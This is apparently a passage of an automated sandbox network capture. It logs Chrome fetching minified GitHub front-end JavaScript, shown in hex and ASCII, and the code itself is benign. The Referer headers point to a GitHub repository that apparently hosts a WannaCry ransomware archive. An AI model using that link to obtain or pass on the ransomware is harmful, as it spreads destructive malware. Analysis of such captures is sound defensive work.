                                                                                      2024-03-23 14:47:23 UTC1378INData Raw: 4e 6f 64 65 54 65 6d 70 6c 61 74 65 50 61 72 74 28 74 2c 73 2e 76 61 6c 75 65 29 29 3b 62 72 65 61 6b 7d 7d 7d 28 74 68 69 73 29 29 29 2c 68 2e 73 65 74 28 74 68 69 73 2c 6e 29 2c 6e 75 6c 6c 3d 3d 3d 28 69 3d 28 73 3d 68 2e 67 65 74 28 74 68 69 73 29 29 2e 63 72 65 61 74 65 43 61 6c 6c 62 61 63 6b 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 69 7c 7c 69 2e 63 61 6c 6c 28 73 2c 74 68 69 73 2c 66 2e 67 65 74 28 74 68 69 73 29 2c 74 29 2c 68 2e 67 65 74 28 74 68 69 73 29 2e 70 72 6f 63 65 73 73 43 61 6c 6c 62 61 63 6b 28 74 68 69 73 2c 66 2e 67 65 74 28 74 68 69 73 29 2c 74 29 7d 75 70 64 61 74 65 28 65 29 7b 68 2e 67 65 74 28 74 68 69 73 29 2e 70 72 6f 63 65 73 73 43 61 6c 6c 62 61 63 6b 28 74 68 69 73 2c 66 2e 67 65 74 28 74 68 69 73 29 2c 65 29 7d 7d 3b 6c 65 74
                                                                                      Data Ascii: NodeTemplatePart(t,s.value));break}}}(this))),h.set(this,n),null===(i=(s=h.get(this)).createCallback)||void 0===i||i.call(s,this,f.get(this),t),h.get(this).processCallback(this,f.get(this),t)}update(e){h.get(this).processCallback(this,f.get(this),e)}};let
                                                                                      2024-03-23 14:47:23 UTC1378INData Raw: 28 74 68 69 73 2e 65 6c 65 6d 65 6e 74 29 2e 73 65 74 28 74 68 69 73 2e 74 79 70 65 2c 74 68 69 73 29 7d 73 65 74 28 65 29 7b 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 65 3f 74 68 69 73 2e 68 61 6e 64 6c 65 45 76 65 6e 74 3d 65 2e 62 69 6e 64 28 74 68 69 73 2e 65 6c 65 6d 65 6e 74 29 3a 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 26 26 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 65 2e 68 61 6e 64 6c 65 45 76 65 6e 74 3f 74 68 69 73 2e 68 61 6e 64 6c 65 45 76 65 6e 74 3d 65 2e 68 61 6e 64 6c 65 45 76 65 6e 74 2e 62 69 6e 64 28 65 29 3a 28 74 68 69 73 2e 65 6c 65 6d 65 6e 74 2e 72 65 6d 6f 76 65 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 74 68 69 73 2e 74 79 70 65 2c 74 68 69 73 29 2c 79 2e 67 65 74 28 74 68 69 73 2e 65
                                                                                      Data Ascii: (this.element).set(this.type,this)}set(e){"function"==typeof e?this.handleEvent=e.bind(this.element):"object"==typeof e&&"function"==typeof e.handleEvent?this.handleEvent=e.handleEvent.bind(e):(this.element.removeEventListener(this.type,this),y.get(this.e
                                                                                      2024-03-23 14:47:23 UTC611INData Raw: 74 2c 7b 69 3a 65 2e 6c 65 6e 67 74 68 7d 29 3b 6c 65 74 20 6e 3d 50 2e 67 65 74 28 74 29 3b 66 6f 72 28 6c 65 74 20 73 3d 30 3b 73 3c 65 2e 6c 65 6e 67 74 68 3b 73 2b 3d 31 29 65 5b 73 5d 69 6e 73 74 61 6e 63 65 6f 66 20 50 72 6f 6d 69 73 65 3f 50 72 6f 6d 69 73 65 2e 72 65 73 6f 6c 76 65 28 65 5b 73 5d 29 2e 74 68 65 6e 28 65 3d 3e 7b 73 3c 6e 2e 69 26 26 28 6e 2e 69 3d 73 2c 77 28 74 2c 65 29 29 7d 29 3a 73 3c 3d 6e 2e 69 26 26 28 6e 2e 69 3d 73 2c 77 28 74 2c 65 5b 73 5d 29 29 7d 29 3b 6c 65 74 20 57 3d 76 28 65 3d 3e 74 3d 3e 7b 76 61 72 20 6e 2c 73 3b 69 66 28 21 28 74 20 69 6e 73 74 61 6e 63 65 6f 66 20 4e 6f 64 65 54 65 6d 70 6c 61 74 65 50 61 72 74 29 29 72 65 74 75 72 6e 3b 6c 65 74 20 6c 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65
                                                                                      Data Ascii: t,{i:e.length});let n=P.get(t);for(let s=0;s<e.length;s+=1)e[s]instanceof Promise?Promise.resolve(e[s]).then(e=>{s<n.i&&(n.i=s,w(t,e))}):s<=n.i&&(n.i=s,w(t,e[s]))});let W=v(e=>t=>{var n,s;if(!(t instanceof NodeTemplatePart))return;let l=document.createEle


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      34192.168.2.1649738185.199.109.1544436264C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-03-23 14:47:23 UTC736OUTGET /assets/vendors-node_modules_github_paste-markdown_dist_index_esm_js-node_modules_github_quote-select-cbac5f-c7885f4526c5.js HTTP/1.1
                                                                                      Host: github.githubassets.com
                                                                                      Connection: keep-alive
                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                      Origin: https://github.com
                                                                                      sec-ch-ua-mobile: ?0
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                      sec-ch-ua-platform: "Windows"
                                                                                      Accept: */*
                                                                                      Sec-Fetch-Site: cross-site
                                                                                      Sec-Fetch-Mode: cors
                                                                                      Sec-Fetch-Dest: script
                                                                                      Referer: https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0/blob/master/Ransomware.WannaCry.zip
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      2024-03-23 14:47:23 UTC688INHTTP/1.1 200 OK
                                                                                      Connection: close
                                                                                      Content-Length: 42351
                                                                                      Cache-Control: public, max-age=31536000, immutable
                                                                                      Content-Type: application/javascript
                                                                                      Last-Modified: Thu, 07 Mar 2024 20:21:24 GMT
                                                                                      ETag: 0x8DC3EE42981EBF3
                                                                                      Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
                                                                                      Via: 1.1 varnish, 1.1 varnish
                                                                                      Accept-Ranges: bytes
                                                                                      Date: Sat, 23 Mar 2024 14:47:23 GMT
                                                                                      Age: 1353041
                                                                                      X-Served-By: cache-iad-kjyo7100059-IAD, cache-ewr18132-EWR
                                                                                      X-Cache: HIT, HIT
                                                                                      X-Cache-Hits: 760, 1
                                                                                      Vary: Accept-Encoding
                                                                                      Cross-Origin-Resource-Policy: cross-origin
                                                                                      Access-Control-Allow-Origin: *
                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                      X-Fastly-Request-ID: 181f4bcb4d7c9c40e24b5ad64a806cabf8d690f7
                                                                                      2024-03-23 14:47:23 UTC1378INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 67 6c 6f 62 61 6c 54 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 3d 67 6c 6f 62 61 6c 54 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 22 76 65 6e 64 6f 72 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 70 61 73 74 65 2d 6d 61 72 6b 64 6f 77 6e 5f 64 69 73 74 5f 69 6e 64 65 78 5f 65 73 6d 5f 6a 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 71 75 6f 74 65 2d 73 65 6c 65 63 74 2d 63 62 61 63 35 66 22 5d 2c 7b 35 32 37 36 39 3a 28 65 2c 74 2c 6e 29 3d 3e 7b 66 75 6e 63 74 69 6f 6e 20 69 28 65 2c 74 29 7b 76 61 72 20 6e 2c 69 2c 72 3b 6c 65 74 20 61 3d 65 2e 76 61 6c 75 65 2e 73 6c 69 63 65 28 30 2c 6e 75 6c 6c 21 3d 3d 28 6e 3d 65 2e
                                                                                      Data Ascii: "use strict";(globalThis.webpackChunk=globalThis.webpackChunk||[]).push([["vendors-node_modules_github_paste-markdown_dist_index_esm_js-node_modules_github_quote-select-cbac5f"],{52769:(e,t,n)=>{function i(e,t){var n,i,r;let a=e.value.slice(0,null!==(n=e.
                                                                                      2024-03-23 14:47:23 UTC1378INData Raw: 61 28 22 74 65 78 74 2f 70 6c 61 69 6e 22 29 2c 6f 3d 74 2e 67 65 74 44 61 74 61 28 22 74 65 78 74 2f 68 74 6d 6c 22 29 2c 73 3d 6f 2e 72 65 70 6c 61 63 65 28 2f 5c 75 30 30 41 30 2f 67 2c 22 20 22 29 2e 72 65 70 6c 61 63 65 28 2f 5c 75 43 32 41 30 2f 67 2c 22 20 22 29 3b 69 66 28 21 6f 7c 7c 21 28 61 3d 61 2e 74 72 69 6d 28 29 29 29 72 65 74 75 72 6e 3b 6c 65 74 20 75 3d 6e 65 77 20 44 4f 4d 50 61 72 73 65 72 2c 64 3d 75 2e 70 61 72 73 65 46 72 6f 6d 53 74 72 69 6e 67 28 73 2c 22 74 65 78 74 2f 68 74 6d 6c 22 29 2c 66 3d 64 2e 63 72 65 61 74 65 54 72 65 65 57 61 6c 6b 65 72 28 64 2e 62 6f 64 79 2c 4e 6f 64 65 46 69 6c 74 65 72 2e 53 48 4f 57 5f 45 4c 45 4d 45 4e 54 2c 65 3d 3e 65 2e 70 61 72 65 6e 74 4e 6f 64 65 26 26 63 28 65 2e 70 61 72 65 6e 74 4e 6f
                                                                                      Data Ascii: a("text/plain"),o=t.getData("text/html"),s=o.replace(/\u00A0/g," ").replace(/\uC2A0/g," ");if(!o||!(a=a.trim()))return;let u=new DOMParser,d=u.parseFromString(s,"text/html"),f=d.createTreeWalker(d.body,NodeFilter.SHOW_ELEMENT,e=>e.parentNode&&c(e.parentNo
                                                                                      2024-03-23 14:47:23 UTC1378INData Raw: 75 6e 63 74 69 6f 6e 20 63 28 65 29 7b 76 61 72 20 74 3b 72 65 74 75 72 6e 28 6e 75 6c 6c 3d 3d 3d 28 74 3d 65 2e 74 61 67 4e 61 6d 65 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 74 3f 76 6f 69 64 20 30 3a 74 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 29 3d 3d 3d 22 61 22 26 26 65 2e 68 61 73 41 74 74 72 69 62 75 74 65 28 22 68 72 65 66 22 29 7d 66 75 6e 63 74 69 6f 6e 20 64 28 65 29 7b 65 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 64 72 61 67 6f 76 65 72 22 2c 76 29 2c 65 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 64 72 6f 70 22 2c 66 29 2c 65 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 70 61 73 74 65 22 2c 70 29 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 29 7b 6c 65 74 20 74 3d 65 2e 64 61 74 61 54 72 61 6e 73 66 65 72 3b 69
                                                                                      Data Ascii: unction c(e){var t;return(null===(t=e.tagName)||void 0===t?void 0:t.toLowerCase())==="a"&&e.hasAttribute("href")}function d(e){e.addEventListener("dragover",v),e.addEventListener("drop",f),e.addEventListener("paste",p)}function f(e){let t=e.dataTransfer;i
                                                                                      2024-03-23 14:47:23 UTC1378INData Raw: 74 54 61 72 67 65 74 3b 69 66 28 21 28 75 20 69 6e 73 74 61 6e 63 65 6f 66 20 48 54 4d 4c 54 65 78 74 41 72 65 61 45 6c 65 6d 65 6e 74 29 29 72 65 74 75 72 6e 3b 6c 65 74 20 63 3d 73 2e 67 65 74 44 61 74 61 28 22 74 65 78 74 2f 70 6c 61 69 6e 22 29 3b 69 66 28 21 63 7c 7c 21 4c 28 63 29 7c 7c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 6c 65 74 20 74 3d 65 2e 73 65 6c 65 63 74 69 6f 6e 53 74 61 72 74 7c 7c 30 3b 69 66 28 21 28 74 3e 31 29 29 72 65 74 75 72 6e 21 31 3b 7b 6c 65 74 20 6e 3d 65 2e 76 61 6c 75 65 2e 73 75 62 73 74 72 69 6e 67 28 74 2d 32 2c 74 29 3b 72 65 74 75 72 6e 22 5d 28 22 3d 3d 3d 6e 7d 7d 28 75 29 29 72 65 74 75 72 6e 3b 6c 65 74 20 64 3d 75 2e 76 61 6c 75 65 2e 73 75 62 73 74 72 69 6e 67 28 75 2e 73 65 6c 65 63 74 69 6f 6e 53 74 61 72 74 2c
                                                                                      Data Ascii: tTarget;if(!(u instanceof HTMLTextAreaElement))return;let c=s.getData("text/plain");if(!c||!L(c)||function(e){let t=e.selectionStart||0;if(!(t>1))return!1;{let n=e.value.substring(t-2,t);return"]("===n}}(u))return;let d=u.value.substring(u.selectionStart,
                                                                                      2024-03-23 14:47:23 UTC1378INData Raw: 74 61 62 6c 65 22 29 29 2c 69 3d 74 2e 6c 61 73 74 49 6e 64 65 78 4f 66 28 22 3c 2f 74 61 62 6c 65 3e 22 29 3b 69 66 28 21 6e 7c 7c 21 69 29 72 65 74 75 72 6e 3b 6c 65 74 20 72 3d 74 2e 73 75 62 73 74 72 69 6e 67 28 69 2b 38 29 2c 61 3d 6e 65 77 20 44 4f 4d 50 61 72 73 65 72 2c 6f 3d 61 2e 70 61 72 73 65 46 72 6f 6d 53 74 72 69 6e 67 28 74 2c 22 74 65 78 74 2f 68 74 6d 6c 22 29 2c 6c 3d 6f 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 22 74 61 62 6c 65 22 29 3b 69 66 28 21 28 6c 3d 21 6c 7c 7c 6c 2e 63 6c 6f 73 65 73 74 28 22 5b 64 61 74 61 2d 70 61 73 74 65 2d 6d 61 72 6b 64 6f 77 6e 2d 73 6b 69 70 5d 22 29 3f 6e 75 6c 6c 3a 6c 29 29 72 65 74 75 72 6e 3b 6c 65 74 20 73 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 6c 65 74 20 74 3d 41 72 72 61 79 2e 66 72 6f 6d
                                                                                      Data Ascii: table")),i=t.lastIndexOf("</table>");if(!n||!i)return;let r=t.substring(i+8),a=new DOMParser,o=a.parseFromString(t,"text/html"),l=o.querySelector("table");if(!(l=!l||l.closest("[data-paste-markdown-skip]")?null:l))return;let s=function(e){let t=Array.from
                                                                                      2024-03-23 14:47:23 UTC1378INData Raw: 22 2c 70 29 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 72 65 6d 6f 76 65 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 70 61 73 74 65 22 2c 78 29 7d 28 65 29 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 72 65 6d 6f 76 65 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 70 61 73 74 65 22 2c 4f 29 7d 28 65 29 7d 7d 7d 7d 2c 35 35 34 39 38 3a 28 65 2c 74 2c 6e 29 3d 3e 7b 66 75 6e 63 74 69 6f 6e 20 69 28 65 29 7b 6c 65 74 20 74 3d 65 2e 70 61 72 65 6e 74 4e 6f 64 65 3b 69 66 28 6e 75 6c 6c 3d 3d 3d 74 7c 7c 21 28 74 20 69 6e 73 74 61 6e 63 65 6f 66 20 48 54 4d 4c 45 6c 65 6d 65 6e 74 29 29 74 68 72 6f 77 20 45 72 72 6f 72 28 29 3b 6c 65 74 20 6e 3d 30 3b 74 20 69 6e 73 74 61 6e 63 65 6f 66 20 48 54 4d 4c 4f 4c 69 73 74 45 6c 65 6d 65 6e 74 26 26 31 21 3d 3d 74
                                                                                      Data Ascii: ",p),function(e){e.removeEventListener("paste",x)}(e),function(e){e.removeEventListener("paste",O)}(e)}}}},55498:(e,t,n)=>{function i(e){let t=e.parentNode;if(null===t||!(t instanceof HTMLElement))throw Error();let n=0;t instanceof HTMLOListElement&&1!==t
                                                                                      2024-03-23 14:47:23 UTC1378INData Raw: 22 77 69 64 74 68 22 29 3f 60 20 77 69 64 74 68 3d 22 24 7b 61 28 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 77 69 64 74 68 22 29 7c 7c 22 22 29 7d 22 60 3a 22 22 2c 72 3d 65 2e 68 61 73 41 74 74 72 69 62 75 74 65 28 22 68 65 69 67 68 74 22 29 3f 60 20 68 65 69 67 68 74 3d 22 24 7b 61 28 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 68 65 69 67 68 74 22 29 7c 7c 22 22 29 7d 22 60 3a 22 22 3b 72 65 74 75 72 6e 20 69 7c 7c 72 3f 60 3c 69 6d 67 20 61 6c 74 3d 22 24 7b 61 28 74 29 7d 22 24 7b 69 7d 24 7b 72 7d 20 73 72 63 3d 22 24 7b 61 28 6e 29 7d 22 3e 60 3a 60 21 5b 24 7b 74 7d 5d 28 24 7b 6e 7d 29 60 7d 2c 4c 49 28 65 29 7b 6c 65 74 20 74 3d 65 2e 70 61 72 65 6e 74 4e 6f 64 65 3b 69 66 28 21 74 29 74 68 72 6f 77 20 45 72 72 6f 72 28 29 3b 6c 65 74
                                                                                      Data Ascii: "width")?` width="${a(e.getAttribute("width")||"")}"`:"",r=e.hasAttribute("height")?` height="${a(e.getAttribute("height")||"")}"`:"";return i||r?`<img alt="${a(t)}"${i}${r} src="${a(n)}">`:`![${t}](${n})`},LI(e){let t=e.parentNode;if(!t)throw Error();let
                                                                                      2024-03-23 14:47:23 UTC1378INData Raw: 7b 76 61 72 20 74 2c 6e 3b 6e 75 6c 6c 3d 3d 3d 28 74 3d 74 68 69 73 2e 73 65 6c 65 63 74 69 6f 6e 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 74 7c 7c 74 2e 72 65 6d 6f 76 65 41 6c 6c 52 61 6e 67 65 73 28 29 2c 6e 75 6c 6c 3d 3d 3d 28 6e 3d 74 68 69 73 2e 73 65 6c 65 63 74 69 6f 6e 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 6e 7c 7c 6e 2e 61 64 64 52 61 6e 67 65 28 65 29 7d 67 65 74 20 73 65 6c 65 63 74 69 6f 6e 54 65 78 74 28 29 7b 76 61 72 20 65 3b 72 65 74 75 72 6e 28 6e 75 6c 6c 3d 3d 3d 28 65 3d 74 68 69 73 2e 73 65 6c 65 63 74 69 6f 6e 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 65 3f 76 6f 69 64 20 30 3a 65 2e 74 6f 53 74 72 69 6e 67 28 29 2e 74 72 69 6d 28 29 29 7c 7c 22 22 7d 67 65 74 20 71 75 6f 74 65 64 54 65 78 74 28 29 7b 72 65 74 75 72 6e 60 3e 20 24 7b 74 68 69
                                                                                      Data Ascii: {var t,n;null===(t=this.selection)||void 0===t||t.removeAllRanges(),null===(n=this.selection)||void 0===n||n.addRange(e)}get selectionText(){var e;return(null===(e=this.selection)||void 0===e?void 0:e.toString().trim())||""}get quotedText(){return`> ${thi
                                                                                      2024-03-23 14:47:23 UTC1378INData Raw: 74 68 72 6f 77 20 45 72 72 6f 72 28 29 3b 6c 65 74 20 74 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 6c 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 6e 6f 64 65 4e 61 6d 65 29 3b 65 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 6f 29 2c 74 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 65 29 2c 28 6f 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 44 6f 63 75 6d 65 6e 74 46 72 61 67 6d 65 6e 74 28 29 29 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 74 29 7d 72 65 74 75 72 6e 20 6f 7d 28 74 68 69 73 2e 72 61 6e 67 65 2c 6e 75 6c 6c 21 3d 3d 28 65 3d 74 68 69 73 2e 73 63 6f 70 65 53 65 6c 65 63 74 6f 72 29 26 26 76 6f 69 64 20 30 21 3d 3d 65 3f 65 3a 22 22 29 3b 6e 75 6c 6c 3d 3d 3d 28 74 3d 74 68 69 73 2e 63 61 6c 6c 62 61 63 6b 29 7c 7c 76 6f 69 64 20 30 3d
                                                                                      Data Ascii: throw Error();let t=document.createElement(l.parentNode.nodeName);e.appendChild(o),t.appendChild(e),(o=document.createDocumentFragment()).appendChild(t)}return o}(this.range,null!==(e=this.scopeSelector)&&void 0!==e?e:"");null===(t=this.callback)||void 0=
                                                                                      2024-03-23 14:47:23 UTC1378INData Raw: 3d 3d 65 2e 64 65 66 61 75 6c 74 43 68 65 63 6b 65 64 3a 65 2e 76 61 6c 75 65 21 3d 3d 65 2e 64 65 66 61 75 6c 74 56 61 6c 75 65 29 7d 66 75 6e 63 74 69 6f 6e 20 61 28 65 29 7b 72 65 74 75 72 6e 20 65 20 69 6e 73 74 61 6e 63 65 6f 66 20 48 54 4d 4c 49 6e 70 75 74 45 6c 65 6d 65 6e 74 7c 7c 65 20 69 6e 73 74 61 6e 63 65 6f 66 20 48 54 4d 4c 54 65 78 74 41 72 65 61 45 6c 65 6d 65 6e 74 7c 7c 65 20 69 6e 73 74 61 6e 63 65 6f 66 20 48 54 4d 4c 53 65 6c 65 63 74 45 6c 65 6d 65 6e 74 7d 66 75 6e 63 74 69 6f 6e 20 6f 28 65 29 7b 72 65 74 75 72 6e 20 65 20 69 6e 73 74 61 6e 63 65 6f 66 20 48 54 4d 4c 49 6e 70 75 74 45 6c 65 6d 65 6e 74 26 26 2f 63 68 65 63 6b 62 6f 78 7c 72 61 64 69 6f 2f 2e 74 65 73 74 28 65 2e 74 79 70 65 29 7d 66 75 6e 63 74 69 6f 6e 20 6c 28
                                                                                      Data Ascii: ==e.defaultChecked:e.value!==e.defaultValue)}function a(e){return e instanceof HTMLInputElement||e instanceof HTMLTextAreaElement||e instanceof HTMLSelectElement}function o(e){return e instanceof HTMLInputElement&&/checkbox|radio/.test(e.type)}function l(


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      35192.168.2.1649739185.199.109.1544436264C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-03-23 14:47:23 UTC682OUTGET /assets/app_assets_modules_github_updatable-content_ts-ee3fc84d7fb0.js HTTP/1.1
                                                                                      Host: github.githubassets.com
                                                                                      Connection: keep-alive
                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                      Origin: https://github.com
                                                                                      sec-ch-ua-mobile: ?0
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                      sec-ch-ua-platform: "Windows"
                                                                                      Accept: */*
                                                                                      Sec-Fetch-Site: cross-site
                                                                                      Sec-Fetch-Mode: cors
                                                                                      Sec-Fetch-Dest: script
                                                                                      Referer: https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0/blob/master/Ransomware.WannaCry.zip
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      2024-03-23 14:47:23 UTC687INHTTP/1.1 200 OK
                                                                                      Connection: close
                                                                                      Content-Length: 12290
                                                                                      Cache-Control: public, max-age=31536000, immutable
                                                                                      Content-Type: application/javascript
                                                                                      Last-Modified: Thu, 22 Feb 2024 16:53:07 GMT
                                                                                      ETag: 0x8DC33C6BE7BBC60
                                                                                      Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
                                                                                      Via: 1.1 varnish, 1.1 varnish
                                                                                      Accept-Ranges: bytes
                                                                                      Date: Sat, 23 Mar 2024 14:47:23 GMT
                                                                                      Age: 272956
                                                                                      X-Served-By: cache-iad-kjyo7100074-IAD, cache-ewr18171-EWR
                                                                                      X-Cache: HIT, HIT
                                                                                      X-Cache-Hits: 651, 1
                                                                                      Vary: Accept-Encoding
                                                                                      Cross-Origin-Resource-Policy: cross-origin
                                                                                      Access-Control-Allow-Origin: *
                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                      X-Fastly-Request-ID: d02668a4a6a517c067b0023f2873a05a1b90ab95
                                                                                      2024-03-23 14:47:23 UTC1378INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 67 6c 6f 62 61 6c 54 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 3d 67 6c 6f 62 61 6c 54 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 22 61 70 70 5f 61 73 73 65 74 73 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 75 70 64 61 74 61 62 6c 65 2d 63 6f 6e 74 65 6e 74 5f 74 73 22 5d 2c 7b 39 37 33 39 30 3a 28 65 2c 74 2c 6e 29 3d 3e 7b 6c 65 74 20 72 2c 6f 2c 69 3b 6e 2e 64 28 74 2c 7b 4d 3a 28 29 3d 3e 73 2c 54 3a 28 29 3d 3e 63 7d 29 3b 76 61 72 20 61 3d 6e 28 31 34 38 34 30 29 2c 6c 3d 6e 28 38 30 37 30 32 29 3b 66 75 6e 63 74 69 6f 6e 20 73 28 65 2c 74 3d 21 31 2c 6e 3d 21 31 29 7b 76 61 72 20 73 3b 72 65 74 75 72 6e 21 6e 26 26 63 28 65 29 7c 7c 66 75 6e 63 74 69 6f
                                                                                      Data Ascii: "use strict";(globalThis.webpackChunk=globalThis.webpackChunk||[]).push([["app_assets_modules_github_updatable-content_ts"],{97390:(e,t,n)=>{let r,o,i;n.d(t,{M:()=>s,T:()=>c});var a=n(14840),l=n(80702);function s(e,t=!1,n=!1){var s;return!n&&c(e)||functio
                                                                                      2024-03-23 14:47:23 UTC1378INData Raw: 6f 63 75 6d 65 6e 74 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 6d 6f 75 73 65 75 70 22 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 6f 3d 6e 75 6c 6c 2c 69 3d 65 2e 74 61 72 67 65 74 7d 2c 21 30 29 2c 64 6f 63 75 6d 65 6e 74 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 63 6f 6e 74 65 78 74 6d 65 6e 75 22 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 6f 3d 6e 75 6c 6c 2c 69 3d 65 2e 74 61 72 67 65 74 7d 2c 21 30 29 2c 64 6f 63 75 6d 65 6e 74 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 64 72 61 67 65 6e 64 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 6f 3d 6e 75 6c 6c 7d 2c 21 30 29 3b 6c 65 74 20 75 3d 22 61 5b 68 72 65 66 5d 2c 20 62 75 74 74 6f 6e 22 7d 2c 37 33 38 39 33 3a 28 65 2c 74 2c 6e 29 3d 3e 7b 6c 65 74 20 72 2c 6f 3b 6e 2e
                                                                                      Data Ascii: ocument.addEventListener("mouseup",function(e){o=null,i=e.target},!0),document.addEventListener("contextmenu",function(e){o=null,i=e.target},!0),document.addEventListener("dragend",function(){o=null},!0);let u="a[href], button"},73893:(e,t,n)=>{let r,o;n.
                                                                                      2024-03-23 14:47:23 UTC1378INData Raw: 7d 2c 21 30 29 2c 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 70 61 67 65 73 68 6f 77 22 2c 28 29 3d 3e 7b 69 3d 5b 5d 2c 61 3d 30 7d 29 7d 2c 35 35 35 35 35 3a 28 65 2c 74 2c 6e 29 3d 3e 7b 6e 2e 64 28 74 2c 7b 48 35 3a 28 29 3d 3e 64 2c 4f 66 3a 28 29 3d 3e 6d 2c 78 30 3a 28 29 3d 3e 70 2c 7a 38 3a 28 29 3d 3e 66 7d 29 3b 76 61 72 20 72 3d 6e 28 39 37 33 39 30 29 2c 6f 3d 6e 28 33 36 30 37 31 29 2c 69 3d 6e 28 38 35 32 35 39 29 2c 61 3d 6e 28 35 32 32 33 29 2c 6c 3d 6e 28 39 36 37 37 36 29 2c 73 3d 6e 28 37 33 38 39 33 29 3b 6c 65 74 20 63 3d 6e 65 77 20 57 65 61 6b 4d 61 70 2c 75 3d 7b 7d 3b 66 75 6e 63 74 69 6f 6e 20 64 28 29 7b 66 6f 72 28 6c 65 74 20 65 20 6f 66 20 4f 62 6a 65 63 74 2e 6b 65 79 73 28 75 29 29 64 65 6c
                                                                                      Data Ascii: },!0),window.addEventListener("pageshow",()=>{i=[],a=0})},55555:(e,t,n)=>{n.d(t,{H5:()=>d,Of:()=>m,x0:()=>p,z8:()=>f});var r=n(97390),o=n(36071),i=n(85259),a=n(5223),l=n(96776),s=n(73893);let c=new WeakMap,u={};function d(){for(let e of Object.keys(u))del
